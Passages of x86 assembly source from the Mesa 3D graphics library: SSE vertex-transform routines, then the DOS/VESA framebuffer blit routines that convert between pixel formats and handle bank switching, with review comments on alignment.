 * dest = x*row0 + y*row1 + z*row2 + w*row3, stored with MOVAPS.
 * Unlike the other routines in this file, the loop counts down in
 * ECX (DEC/JNZ) instead of comparing EDI against a sentinel, and a
 * PREFETCHT0 warms the first source vertex before the loop.
 * NOTE(review): MOVAPS on matrix rows and dest requires 16-byte
 * alignment of both -- confirm callers guarantee this.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = remaining count; XMM0-XMM3 are per-vertex scratch.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_sse_transform_points4_general )
HIDDEN(_mesa_sse_transform_points4_general)
GLNAME( _mesa_sse_transform_points4_general ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* verify non-zero count */
JE( LLBL( sse_general_done ) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )/* set dest size */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
PREFETCHT0( REGIND(ESI) )
/* hoist the four matrix rows out of the loop */
MOVAPS( MAT(0), XMM4 ) /* m3 | m2 | m1 | m0 */
MOVAPS( MAT(4), XMM5 ) /* m7 | m6 | m5 | m4 */
MOVAPS( MAT(8), XMM6 ) /* m11 | m10 | m9 | m8 */
MOVAPS( MAT(12), XMM7 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT16
LLBL( sse_general_loop ):
MOVSS( SRC(0), XMM0 ) /* ox */
SHUFPS( CONST(0x0), XMM0, XMM0 ) /* ox | ox | ox | ox */
MULPS( XMM4, XMM0 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( SRC(1), XMM1 ) /* oy */
SHUFPS( CONST(0x0), XMM1, XMM1 ) /* oy | oy | oy | oy */
MULPS( XMM5, XMM1 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
MOVSS( SRC(2), XMM2 ) /* oz */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* oz | oz | oz | oz */
MULPS( XMM6, XMM2 ) /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
MOVSS( SRC(3), XMM3 ) /* ow */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ow | ow | ow | ow */
MULPS( XMM7, XMM3 ) /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
ADDPS( XMM1, XMM0 ) /* ox*m3+oy*m7 | ... */
ADDPS( XMM2, XMM0 ) /* ox*m3+oy*m7+oz*m11 | ... */
ADDPS( XMM3, XMM0 ) /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
MOVAPS( XMM0, DST(0) ) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
DEC_L( ECX )
JNZ( LLBL( sse_general_loop ) )
LLBL( sse_general_done ):
POP_L( EDI )
POP_L( ESI )
RET
/*
 * _mesa_sse_transform_points4_3d
 * SSE transform of 4-component points by a "3d" matrix.  The full
 * 4-component dot products are computed and stored with MOVAPS, then
 * the w slot (DST(3)) is immediately overwritten with the source w,
 * passing it through unchanged.  Dest size/flags are set to
 * 3 / VEC_SIZE_3.
 * NOTE(review): MOVAPS requires 16-byte-aligned matrix and dest.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM4-XMM7 are per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME( _mesa_sse_transform_points4_3d )
HIDDEN(_mesa_sse_transform_points4_3d)
GLNAME( _mesa_sse_transform_points4_3d ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI ) /* ptr to source GLvector4f */
MOV_L( ARG_DEST, EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP43P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )/* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
/* hoist the four matrix rows out of the loop */
MOVAPS( MAT(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( MAT(4), XMM1 ) /* m7 | m6 | m5 | m4 */
MOVAPS( MAT(8), XMM2 ) /* m11 | m10 | m9 | m8 */
MOVAPS( MAT(12), XMM3 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL( K_GTP43P3DR_top ):
MOVSS( SRC(0), XMM4 ) /* ox */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM4 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( SRC(1), XMM5 ) /* oy */
SHUFPS( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy | oy */
MULPS( XMM1, XMM5 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
MOVSS( SRC(2), XMM6 ) /* oz */
SHUFPS( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz | oz */
MULPS( XMM2, XMM6 ) /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
MOVSS( SRC(3), XMM7 ) /* ow */
SHUFPS( CONST(0x0), XMM7, XMM7 ) /* ow | ow | ow | ow */
MULPS( XMM3, XMM7 ) /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
ADDPS( XMM5, XMM4 ) /* ox*m3+oy*m7 | ... */
ADDPS( XMM6, XMM4 ) /* ox*m3+oy*m7+oz*m11 | ... */
ADDPS( XMM7, XMM4 ) /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
MOVAPS( XMM4, DST(0) ) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
/* restore the untransformed w into DST(3) */
MOVSS( SRC(3), XMM4 ) /* ow */
MOVSS( XMM4, DST(3) ) /* ->D(3) */
LLBL( K_GTP43P3DR_skip ):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP43P3DR_top) )
LLBL( K_GTP43P3DR_finish ):
POP_L( EDI )
POP_L( ESI )
RET
/*
 * _mesa_sse_transform_points4_identity
 * Identity "transform" for 4-component points: one MOVAPS load/store
 * per vertex, with PREFETCHNTA 32 bytes ahead of the source.  The
 * loop counts down in ECX (DEC/JNZ).
 * NOTE(review): MOVAPS requires both source and dest vertices to be
 * 16-byte aligned; there is no src == dst shortcut here, unlike the
 * points3 identity routine.
 * Regs: ESI = src ptr, EDI = dst ptr, EAX = src stride,
 *       ECX = remaining count; XMM0 is copy scratch.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_sse_transform_points4_identity )
HIDDEN(_mesa_sse_transform_points4_identity)
GLNAME( _mesa_sse_transform_points4_identity ):
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* verify non-zero count */
JE( LLBL( sse_identity_done ) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )/* set dest size */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ALIGNTEXT16
LLBL( sse_identity_loop ):
PREFETCHNTA( REGOFF(32, ESI) )
MOVAPS( REGIND(ESI), XMM0 )
ADD_L( EAX, ESI )
MOVAPS( XMM0, REGIND(EDI) )
ADD_L( CONST(16), EDI )
DEC_L( ECX )
JNZ( LLBL( sse_identity_loop ) )
LLBL( sse_identity_done ):
POP_L( EDI )
POP_L( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 18,871
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/drivers/dos/blit.S
|
/*
* Mesa 3-D graphics library
* Version: 4.0
*
* Copyright (C) 1999 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* DOS/DJGPP device driver for Mesa
*
* Author: Daniel Borca
* Email : dborca@yahoo.com
* Web : http://www.geocities.com/dborca
*/
.file "blit.S"
/*
* extern unsigned int vesa_gran_mask, vesa_gran_shift;
* extern int vl_video_selector;
* extern void *vl_current_draw_buffer;
* extern int vl_current_stride, vl_current_height;
* extern int vl_current_offset, vl_current_delta;
*/
.text
/* Desc: VESA bank switching routine (BIOS)
*
* In : EBX=0, EDX = bank number
* Out : -
*
* Note: thrashes EAX
*/
/* Default VESA bank-switch routine: VBE "Display Window Control"
 * (AX = 4F05h) via the real-mode video BIOS, per the calling
 * convention documented above (EBX = 0, EDX = bank number).
 * Clobbers EAX only.
 */
.p2align 5,,31
_vesa_swbankBIOS:
	movw	$0x4f05, %ax
	int	$0x10
	ret
.p2align 2,,3
.global _vesa_swbank
_vesa_swbank: .long _vesa_swbankBIOS
/* Desc: void vesa_b_dump_virtual (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
/* Copy the current draw buffer to banked (windowed) video memory.
 * Walks the buffer one scanline at a time, 4 bytes per MOVSL, and
 * calls *_vesa_swbank to advance the window whenever EDI crosses the
 * current bank granule.
 * Register roles inside the copy:
 *   ESI = system-memory source, EDI = offset within the bank window,
 *   EDX = current bank number, EBP = bank granule size (mask + 1),
 *   ECX = dwords left in the scanline, EAX = scanlines left,
 *   EBX = per-scanline delta (vl_current_delta), ES = video selector.
 * EAX/EBX are saved around the bank-switch call because the switch
 * routine is documented above as thrashing EAX (and takes EBX = 0).
 */
.p2align 5,,31
.global _vesa_b_dump_virtual
_vesa_b_dump_virtual:
	cld
	pushl	%es
	pushl	%ebx
	pushl	%esi
	pushl	%edi
	pushl	%ebp
	movl	_vl_video_selector, %es
	movl	_vl_current_draw_buffer, %esi
	movl	_vl_current_offset, %edi
	movl	_vesa_gran_mask, %ecx
	movl	_vesa_gran_mask, %ebp
	movl	%edi, %edx
	xorl	%ebx, %ebx
	andl	%ebp, %edi
	shrl	%cl, %edx
	incl	%ebp
	call	*_vesa_swbank
	movl	_vl_current_stride, %ecx
	movl	_vl_current_height, %eax
	movl	_vl_current_delta, %ebx
	shrl	$2, %ecx
	.balign	4
0:
	pushl	%ecx
	.balign	4
1:
	/* window exhausted? switch to the next bank */
	cmpl	%ebp, %edi
	jb	2f
	pushl	%eax
	pushl	%ebx
	incl	%edx
	xorl	%ebx, %ebx
	call	*_vesa_swbank
	popl	%ebx
	popl	%eax
	subl	%ebp, %edi
	.balign	4
2:
	movsl
	decl	%ecx
	jnz	1b
	popl	%ecx
	addl	%ebx, %edi
	decl	%eax
	jnz	0b
	popl	%ebp
	popl	%edi
	popl	%esi
	popl	%ebx
	popl	%es
	ret
/* Desc: void vesa_l_dump_virtual (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
/* Copy the current draw buffer to a linear framebuffer: one
 * REP MOVSL per scanline (stride is divided by 4 into dwords), then
 * EDI is advanced by vl_current_delta between scanlines.
 * Regs: ESI = source, EDI = framebuffer offset (through ES),
 *       ECX = dwords per scanline, EDX = scanlines remaining,
 *       EAX = inter-scanline delta.
 */
.p2align 5,,31
.global _vesa_l_dump_virtual
_vesa_l_dump_virtual:
	cld
	pushl	%es
	pushl	%esi
	pushl	%edi
	movl	_vl_video_selector, %es
	movl	_vl_current_draw_buffer, %esi
	movl	_vl_current_offset, %edi
	movl	_vl_current_stride, %ecx
	movl	_vl_current_height, %edx
	movl	_vl_current_delta, %eax
	shrl	$2, %ecx
	.balign	4
0:
	pushl	%ecx
	rep; movsl
	popl	%ecx
	addl	%eax, %edi
	decl	%edx
	jnz	0b
	popl	%edi
	popl	%esi
	popl	%es
	ret
/* Desc: void vesa_l_dump_virtual_mmx (void);
*
* In : -
* Out : -
*
* Note: uses current draw buffer
*/
/* MMX variant of the linear framebuffer dump: copies 8 bytes per
 * iteration with MOVQ through the FS segment (stride divided by 8
 * into qwords), then advances EDI by vl_current_delta per scanline.
 * EMMS is issued before returning so the FPU state is usable again.
 * When USE_MMX_ASM is not defined this compiles to a bare RET.
 * Regs: ESI = source, EDI = framebuffer offset (through FS),
 *       ECX = qwords per scanline, EDX = scanlines remaining,
 *       EAX = inter-scanline delta, MM0 = copy scratch.
 */
.p2align 5,,31
.global _vesa_l_dump_virtual_mmx
_vesa_l_dump_virtual_mmx:
#ifdef USE_MMX_ASM
	pushl	%esi
	pushl	%edi
	movl	_vl_video_selector, %fs
	movl	_vl_current_draw_buffer, %esi
	movl	_vl_current_offset, %edi
	movl	_vl_current_stride, %ecx
	movl	_vl_current_height, %edx
	movl	_vl_current_delta, %eax
	shrl	$3, %ecx
	.balign	4
0:
	pushl	%ecx
	.balign	4
1:
	movq	(%esi), %mm0
	addl	$8, %esi
	movq	%mm0, %fs:(%edi)
	addl	$8, %edi
	decl	%ecx
	jnz	1b
	popl	%ecx
	addl	%eax, %edi
	decl	%edx
	jnz	0b
	popl	%edi
	popl	%esi
	emms
#endif
	ret
/* Convert one 32bpp BGRA pixel held in %e<s>x into a B5G6R5 pixel in
 * %<s>x.  's' is a register letter (e.g. 'a' -> eax/ax/ah); 'tmp' is a
 * 32-bit scratch register that is clobbered.  The bit diagrams below
 * are written with bit 0 LEFTMOST, i.e. blue is the low byte.
 */
#define CVT_32_TO_16(s, tmp) \
/* SRC = bbbbbbbbggggggggrrrrrrrr******** */\
movl %e##s##x, %tmp ;\
/* TMP = bbbbbbbbggggggggrrrrrrrr******** */\
shrb $2, %s##h ;\
/* SRC = bbbbbbbbgggggg00rrrrrrrr******** */\
andl $0xF80000, %tmp ;\
/* TMP = 0000000000000000000rrrrr00000000 */\
shrw $3, %s##x ;\
/* SRC = bbbbbgggggg00000rrrrrrrr******** */\
shrl $8, %tmp ;\
/* TMP = 00000000000rrrrr0000000000000000 */\
orl %tmp, %e##s##x ;\
/* SRC = bbbbbggggggrrrrrrrrrrrrr******** */
/* Convert one 32bpp BGRA pixel held in %e<s>x into a B5G5R5 pixel in
 * %<s>x.  Same conventions as CVT_32_TO_16 (bit 0 leftmost in the
 * diagrams); green keeps only 5 bits here, hence the shifts of 3/9.
 * The diagrams below were stale copies from the 5:6:5 variant and have
 * been corrected to match the actual shifts.
 */
#define CVT_32_TO_15(s, tmp) \
/* SRC = bbbbbbbbggggggggrrrrrrrr******** */\
movl %e##s##x, %tmp ;\
/* TMP = bbbbbbbbggggggggrrrrrrrr******** */\
shrb $3, %s##h ;\
/* SRC = bbbbbbbbggggg000rrrrrrrr******** */\
andl $0xF80000, %tmp ;\
/* TMP = 0000000000000000000rrrrr00000000 */\
shrw $3, %s##x ;\
/* SRC = bbbbbggggg000000rrrrrrrr******** */\
shrl $9, %tmp ;\
/* TMP = 0000000000rrrrr00000000000000000 */\
orl %tmp, %e##s##x ;\
/* SRC = bbbbbgggggrrrrr0rrrrrrrr******** */
/* Narrow TWO B5G6R5 pixels packed in 'src' to B5G5R5 in place, dropping
 * the low green bit of each.  'src' and 'tmp' are full 32-bit
 * registers; tmp is clobbered.  Bit 0 is leftmost in the diagrams;
 * lower-case letters are the low pixel, upper-case the high pixel.
 * NOTE(review): the final diagram line ends in '\', so the following
 * "transform BGRA to BGR" comment is spliced into the macro body --
 * harmless (comments are stripped), but mind it when editing.
 */
#define CVT_16_TO_15(src, tmp) \
/* SRC = bbbbbggggggrrrrrBBBBBGGGGGGRRRRR */\
movl %src, %tmp ;\
/* TMP = bbbbbggggggrrrrrBBBBBGGGGGGRRRRR */\
andl $0x1F001F, %src ;\
/* SRC = bbbbb00000000000BBBBB00000000000 */\
andl $0xFFC0FFC0, %tmp ;\
/* TMP = 000000gggggrrrrr000000GGGGGRRRRR */\
shrl %tmp ;\
/* TMP = 00000gggggrrrrr000000GGGGGRRRRR0 */\
orl %tmp, %src ;\
/* SRC = bbbbbgggggrrrrr0BBBBBGGGGGRRRRR0 */\
/* transform BGRA to BGR */
.p2align 5,,31
.global _vesa_l_dump_32_to_24
/* Linear dump, 32bpp BGRA source -> 24bpp BGR destination (%fs).
 * Writes 3 bytes per pixel (word + high byte); ecx counts DESTINATION
 * bytes per row (vl_current_stride), decremented by 3 per pixel.
 * Thrashes eax/ecx/edx and %fs.
 */
_vesa_l_dump_32_to_24:
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
movw %ax, %fs:(%edi) /* store B,G */
shrl $16, %eax
movb %al, %fs:2(%edi) /* store R, drop A */
addl $3, %edi
subl $3, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
ret
/* transform BGRA to B5G6R5 */
.p2align 5,,31
.global _vesa_l_dump_32_to_16
/* Linear dump, 32bpp BGRA source -> B5G6R5 destination (%fs).
 * One pixel per iteration through CVT_32_TO_16 (ebp is its scratch);
 * ecx counts destination bytes per row, 2 per pixel.
 */
_vesa_l_dump_32_to_16:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
CVT_32_TO_16(a, ebp) /* ax = 5:6:5 pixel */
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGRA to B5G5R5 */
.p2align 5,,31
.global _vesa_l_dump_32_to_15
/* Linear dump, 32bpp BGRA source -> B5G5R5 destination (%fs).
 * Identical structure to _vesa_l_dump_32_to_16 but narrows through
 * CVT_32_TO_15 (5-bit green).
 */
_vesa_l_dump_32_to_15:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
CVT_32_TO_15(a, ebp) /* ax = 5:5:5 pixel */
movw %ax, %fs:(%edi)
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGRA to fake8 */
.p2align 5,,31
.global _vesa_l_dump_32_to_8
/* Linear dump, 32bpp BGRA source -> 8bpp "fake8" destination (%fs).
 * Each component is first mapped through _array_b/_array_g/_array_r
 * (presumably 256 -> 0..5 quantization tables -- confirm), then the
 * palette index is formed as b*36 + g*6 + r, i.e. a 6x6x6 color cube.
 * edx/ebx of the outer loop (height, delta) are saved on the stack
 * around the inner loop because the conversion reuses them.
 */
_vesa_l_dump_32_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %edx
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax /* load BGRA pixel */
addl $4, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl /* bl = green */
shrl $16, %edx
andl $0xFF, %edx /* edx = red */
andl $0xFF, %eax /* eax = blue */
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax /* index = b*36 + g*6 + r */
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ebx
popl %ecx
popl %edx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform BGR to BGRx */
.p2align 5,,31
.global _vesa_l_dump_24_to_32
/* Linear dump, 24bpp BGR source -> 32bpp BGRx destination (%fs).
 * Loads a dword but advances the source by only 3, so the 4th (x) byte
 * written is the B of the next pixel.
 * NOTE(review): the final pixel of the buffer reads one byte past the
 * end of the source -- confirm the draw buffer is padded.
 */
_vesa_l_dump_24_to_32:
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax /* load BGR + first byte of next pixel */
addl $3, %esi
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
ret
/* transform BGR to fake8 */
.p2align 5,,31
.global _vesa_l_dump_24_to_8
/* Linear dump, 24bpp BGR source -> 8bpp "fake8" destination (%fs).
 * Same 6x6x6-cube conversion as _vesa_l_dump_32_to_8 (index =
 * b*36 + g*6 + r via the _array_* tables) but the source advances by
 * 3 bytes per pixel; the 4th loaded byte is ignored by the masks.
 */
_vesa_l_dump_24_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %edx
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax /* load BGR (+1 overlap byte) */
addl $3, %esi
#if 1
xorl %ebx, %ebx
movl %eax, %edx
movb %ah, %bl /* bl = green */
shrl $16, %edx
andl $0xFF, %edx /* edx = red */
andl $0xFF, %eax /* eax = blue */
movb _array_b(%eax), %al
movb _array_r(%edx), %dl
movb _array_g(%ebx), %bl
imull $36, %eax /* index = b*36 + g*6 + r */
imull $6, %ebx
addl %edx, %eax
addl %ebx, %eax
#endif
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ebx
popl %ecx
popl %edx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform B5G6R5 to B5G5R5 */
.p2align 5,,31
.global _vesa_l_dump_16_to_15
/* Linear dump, B5G6R5 source -> B5G5R5 destination (%fs).
 * Processes TWO pixels per iteration: loads a dword and narrows both
 * halves in place with CVT_16_TO_15 (ebp is its scratch).
 */
_vesa_l_dump_16_to_15:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
1:
movl (%esi), %eax /* load two 16bpp pixels */
addl $4, %esi
CVT_16_TO_15(eax, ebp) /* narrow both to 5:5:5 */
movl %eax, %fs:(%edi)
addl $4, %edi
subl $4, %ecx
jnz 1b
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
/* transform B5G6R5 to fake8 */
.p2align 5,,31
.global _vesa_l_dump_16_to_8
/* Linear dump, B5G6R5 source -> 8bpp destination (%fs) via the 64K
 * _tab_16_8 lookup table (one palette byte per 16-bit pixel value).
 * Processes two pixels per iteration; ebx (delta) is saved around the
 * inner loop because it is reused as the second table index.
 */
_vesa_l_dump_16_to_8:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vl_current_stride, %ecx
movl _vl_current_height, %edx
movl _vl_current_delta, %ebx
.balign 4
0:
pushl %ecx
pushl %ebx
1:
movl (%esi), %eax /* load two 16bpp pixels */
addl $4, %esi
#if 1
movl %eax, %ebx
andl $0xFFFF, %eax /* eax = low pixel */
shrl $16, %ebx /* ebx = high pixel */
movb _tab_16_8(%eax), %al
movb _tab_16_8(%ebx), %ah
#endif
movw %ax, %fs:(%edi) /* store both converted bytes */
addl $2, %edi
subl $2, %ecx
jnz 1b
popl %ebx
popl %ecx
addl %ebx, %edi /* skip the per-row delta */
decl %edx
jnz 0b
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_24
/* Banked dump, 32bpp BGRA source -> 24bpp BGR destination.
 * Copies byte-by-byte; ebx holds a rotating 0x00FFFFFF mask whose
 * carry-out after `rorl $8` selects which source bytes are stored:
 * three carries (B,G,R) write, the fourth (A) loops back and is
 * skipped.  Bank layout registers are as in _vesa_b_dump_virtual
 * (edx = bank, edi = window offset, ebp = bank size).
 */
_vesa_b_dump_32_to_24:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
movl $0x00FFFFFF, %ebx /* byte-select mask: write 3, skip 1 */
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
pushl %ebx /* preserve the mask across the switch */
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
popl %ebx
subl %ebp, %edi
.balign 4
2:
movb (%esi), %al /* XXX too many accesses */
incl %esi
rorl $8, %ebx /* CF=1 for B/G/R bytes, CF=0 for A */
jnc 2b /* skip the alpha byte */
movb %al, %fs:(%edi)
incl %edi
decl %ecx
jnz 1b
popl %ecx
popl %eax
addl _vl_current_delta, %edi /* skip the per-row delta */
decl %eax
jnz 0b
popl %ebp
popl %edi
popl %esi
popl %ebx
ret
.p2align 5,,31
.global _vesa_b_dump_32_to_16
/* Banked dump, 32bpp BGRA source -> B5G6R5 destination.
 * One pixel per iteration through CVT_32_TO_16 (ebx doubles as the
 * macro scratch, so it is simply re-zeroed before each bank switch).
 * edx = bank, edi = window offset, ebp = bank size.
 */
_vesa_b_dump_32_to_16:
pushl %ebx
pushl %esi
pushl %edi
pushl %ebp
movl _vl_video_selector, %fs
movl _vl_current_draw_buffer, %esi
movl _vl_current_offset, %edi
movl _vesa_gran_shift, %ecx
movl _vesa_gran_mask, %ebp
movl %edi, %edx
xorl %ebx, %ebx
andl %ebp, %edi /* edi = offset inside the bank window */
shrl %cl, %edx /* edx = starting bank */
incl %ebp /* ebp = bank size */
call *_vesa_swbank
movl _vl_current_stride, %ecx
movl _vl_current_height, %eax
.balign 4
0:
pushl %eax
pushl %ecx
.balign 4
1:
cmpl %ebp, %edi
jb 2f
incl %edx
xorl %ebx, %ebx
call *_vesa_swbank
subl %ebp, %edi
.balign 4
2:
